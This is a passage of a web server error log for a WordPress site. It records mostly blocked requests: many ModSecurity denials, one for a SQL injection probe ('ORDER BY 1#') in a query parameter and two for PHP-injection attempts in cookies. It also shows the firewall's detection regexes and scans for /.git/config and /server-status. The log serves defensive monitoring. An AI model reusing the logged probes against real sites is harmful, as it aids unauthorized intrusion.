"OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExhzEhNOprNgeRyDcQDQAAAJU"] [Fri Jul 12 08:37:11.719424 2024] [:error] [pid 30143:tid 139783695181568] [client 141.98.81.44:38304] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExhxoAeojmxWlFps7w6AAAANQ"] [Fri Jul 12 08:37:12.158278 2024] [:error] [pid 29517:tid 139783916037888] [client 141.98.81.44:38306] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExiPUCh5vf5PuAcijkBAAAAAI"] [Fri Jul 12 08:37:12.485633 2024] [:error] [pid 30143:tid 139783907645184] [client 141.98.81.44:38308] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExiBoAeojmxWlFps7w6QAAAMM"] [Fri Jul 12 08:37:12.823896 2024] [:error] [pid 29519:tid 139783779108608] [client 141.98.81.44:38310] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExiDEhNOprNgeRyDcQDgAAAIo"] [Fri Jul 12 08:37:13.177285 2024] [:error] [pid 30143:tid 139783795894016] [client 141.98.81.44:38312] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExiRoAeojmxWlFps7w6gAAAMg"] [Fri Jul 12 08:37:13.511744 2024] [:error] [pid 30143:tid 139783787501312] [client 141.98.81.44:38314] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExiRoAeojmxWlFps7w6wAAAMk"] [Fri Jul 12 08:37:13.933413 2024] [:error] [pid 30143:tid 139783899252480] [client 141.98.81.44:38316] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExiRoAeojmxWlFps7w7AAAAMQ"] [Fri Jul 12 08:37:14.255740 2024] [:error] [pid 30143:tid 139783762323200] [client 141.98.81.44:38318] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47 ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExihoAeojmxWlFps7w7QAAAMw"] [Fri Jul 12 08:37:14.633055 2024] [:error] [pid 30143:tid 139783882467072] [client 141.98.81.44:38320] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExihoAeojmxWlFps7w7gAAAMY"] [Fri Jul 12 08:37:15.018024 2024] [:error] [pid 30143:tid 139783804286720] [client 141.98.81.44:38322] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExixoAeojmxWlFps7w7wAAAMc"] [Fri Jul 12 08:37:15.517631 2024] [:error] [pid 29517:tid 139783932823296] [client 141.98.81.44:38324] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExi_UCh5vf5PuAcijkBQAAAAA"] [Fri Jul 12 08:37:19.862897 2024] [:error] [pid 29518:tid 139783890859776] [client 141.98.81.44:38342] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExj6g1rY6w-xq1eShSZQAAAEU"] [Fri Jul 12 08:37:20.109859 2024] [:error] [pid 30143:tid 139783745537792] [client 141.98.81.44:38344] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExkBoAeojmxWlFps7w8AAAAM4"] [Fri Jul 12 08:37:20.355736 2024] [:error] [pid 30143:tid 139783753930496] [client 141.98.81.44:38346] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExkBoAeojmxWlFps7w8QAAAM0"] [Fri Jul 12 08:37:20.599656 2024] [:error] [pid 30143:tid 139783720359680] [client 141.98.81.44:38348] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExkBoAeojmxWlFps7w8gAAANE"] [Fri Jul 12 08:37:20.868883 2024] [:error] [pid 29519:tid 139783762323200] [client 141.98.81.44:38350] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExkDEhNOprNgeRyDcQDwAAAIw"] [Fri Jul 12 08:37:21.114695 2024] [:error] [pid 29519:tid 139783787501312] [client 141.98.81.44:38352] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExkTEhNOprNgeRyDcQEAAAAIk"] [Fri Jul 12 08:37:21.362427 2024] [:error] [pid 29519:tid 139783804286720] [client 141.98.81.44:38354] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExkTEhNOprNgeRyDcQEQAAAIc"] [Fri Jul 12 11:03:19.070226 2024] [authz_core:error] [pid 29518:tid 139783661610752] [client 128.199.182.77:40896] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/12 11:03:25 [error] 29480#29480: *26847 access forbidden by rule, client: 128.199.182.77, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Jul 12 17:33:37.398018 2024] [:error] [pid 29519:tid 139783916037888] [client 52.180.157.104:55262] [client 52.180.157.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZpGvQTEhNOprNgeRyDcU_QAAAII"], referer: www.google.com [Fri Jul 12 17:33:38.235709 2024] [:error] [pid 13051:tid 139783711966976] [client 52.180.157.104:55264] [client 52.180.157.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZpGvQp4ZKorfSRNfWt7C6wAAARI"], referer: www.google.com [Sat Jul 13 03:19:24.890017 2024] [ssl:warn] [pid 14704:tid 140616778979200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 13 03:19:33.098986 2024] [ssl:warn] [pid 14705:tid 140616778979200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 13 03:19:33.636518 2024] [ssl:warn] [pid 14705:tid 140616778979200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 13 03:19:35.886532 2024] [ssl:warn] [pid 14705:tid 140616778979200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 13 03:19:38.168887 2024] [ssl:warn] [pid 15128:tid 140276134029184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 13 03:19:50.392899 2024] [ssl:warn] [pid 15136:tid 140276134029184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 13 10:44:16.604710 2024] [ssl:warn] [pid 32332:tid 140328107706240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 13 10:44:28.949168 2024] [ssl:warn] [pid 32517:tid 140328107706240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 13 10:44:29.421202 2024] [ssl:warn] [pid 32517:tid 140328107706240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 13 10:44:31.907199 2024] [ssl:warn] [pid 32517:tid 140328107706240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 13 10:44:34.202854 2024] [ssl:warn] [pid 521:tid 140435095574400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 13 10:44:50.489598 2024] [ssl:warn] [pid 566:tid 140435095574400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jul 13 17:10:33.411246 2024] [authz_core:error] [pid 600:tid 140434751842048] [client 104.237.130.38:45268] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/13 17:10:36 [error] 493#493: *43381 access forbidden by rule, client: 104.237.130.38, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Jul 13 17:11:02.497801 2024] [authz_core:error] [pid 688:tid 140434785412864] [client 192.46.211.230:45306] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/13 17:11:17 [error] 492#492: *43414 access forbidden by rule, client: 192.46.211.230, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Jul 13 19:03:36.274154 2024] [ssl:warn] [pid 566:tid 140435095574400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 14 01:33:00.489575 2024] [authz_core:error] [pid 25300:tid 140434818983680] [client 23.239.21.238:54332] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/14 01:33:04 [error] 25141#25141: *49221 access forbidden by rule, client: 23.239.21.238, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Jul 14 03:12:33.237503 2024] [ssl:warn] [pid 28330:tid 140284364867456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 14 03:12:45.471319 2024] [ssl:warn] [pid 28338:tid 140284364867456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 14 03:12:45.838611 2024] [ssl:warn] [pid 28338:tid 140284364867456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 14 03:12:48.034759 2024] [ssl:warn] [pid 28338:tid 140284364867456] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 14 03:12:50.320581 2024] [ssl:warn] [pid 28781:tid 140508424726400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 14 03:13:02.607950 2024] [ssl:warn] [pid 28786:tid 140508424726400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jul 14 08:47:36.304910 2024] [authz_core:error] [pid 30459:tid 140508009543424] [client 46.101.1.225:32786] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/14 08:47:40 [error] 28667#28667: *53198 access forbidden by rule, client: 46.101.1.225, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Jul 15 03:30:32.416599 2024] [ssl:warn] [pid 29540:tid 140245750413184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 15 03:30:45.798506 2024] [ssl:warn] [pid 29542:tid 140245750413184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 15 03:30:46.354876 2024] [ssl:warn] [pid 29542:tid 140245750413184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 15 03:30:48.680489 2024] [ssl:warn] [pid 29542:tid 140245750413184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 15 03:30:51.023984 2024] [ssl:warn] [pid 29991:tid 140239530846080] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 15 03:30:59.313231 2024] [ssl:warn] [pid 29992:tid 140239530846080] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 16 02:43:43.218714 2024] [authz_core:error] [pid 30015:tid 140239246968576] [client 64.227.32.66:49094] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/16 02:43:47 [error] 29973#29973: *78972 access forbidden by rule, client: 64.227.32.66, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Jul 16 03:34:20.551220 2024] [ssl:warn] [pid 29171:tid 140103609268096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 16 03:34:34.833191 2024] [ssl:warn] [pid 29179:tid 140103609268096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 16 03:34:35.355669 2024] [ssl:warn] [pid 29179:tid 140103609268096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 16 03:34:37.178377 2024] [ssl:warn] [pid 29179:tid 140103609268096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 16 03:34:39.462082 2024] [ssl:warn] [pid 29594:tid 139732061771648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 16 03:34:51.757002 2024] [ssl:warn] [pid 29597:tid 139732061771648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 16 03:34:52.641753 2024] [ssl:warn] [pid 29597:tid 139732061771648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 16 03:44:26.238833 2024] [authz_core:error] [pid 30388:tid 139731786524416] [client 64.23.218.208:49828] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/16 03:44:29 [error] 29721#29721: *79393 access forbidden by rule, client: 64.23.218.208, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Jul 16 13:20:51.247145 2024] [authz_core:error] [pid 3528:tid 139731669026560] [client 206.81.24.227:57550] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/16 13:20:55 [error] 29720#29720: *84342 access forbidden by rule, client: 206.81.24.227, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Jul 17 03:24:24.945364 2024] [ssl:warn] [pid 14484:tid 140452689954688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 17 03:24:37.382555 2024] [ssl:warn] [pid 14485:tid 140452689954688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 17 03:24:37.935227 2024] [ssl:warn] [pid 14485:tid 140452689954688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 17 03:24:40.055234 2024] [ssl:warn] [pid 14485:tid 140452689954688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 17 03:24:42.350700 2024] [ssl:warn] [pid 14900:tid 140400128550784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 17 03:24:46.666866 2024] [ssl:warn] [pid 14901:tid 140400128550784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 18 00:06:40.028653 2024] [authz_core:error] [pid 15121:tid 140399670626048] [client 139.59.132.8:34588] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/18 00:06:43 [error] 14881#14881: *100326 access forbidden by rule, client: 139.59.132.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Jul 18 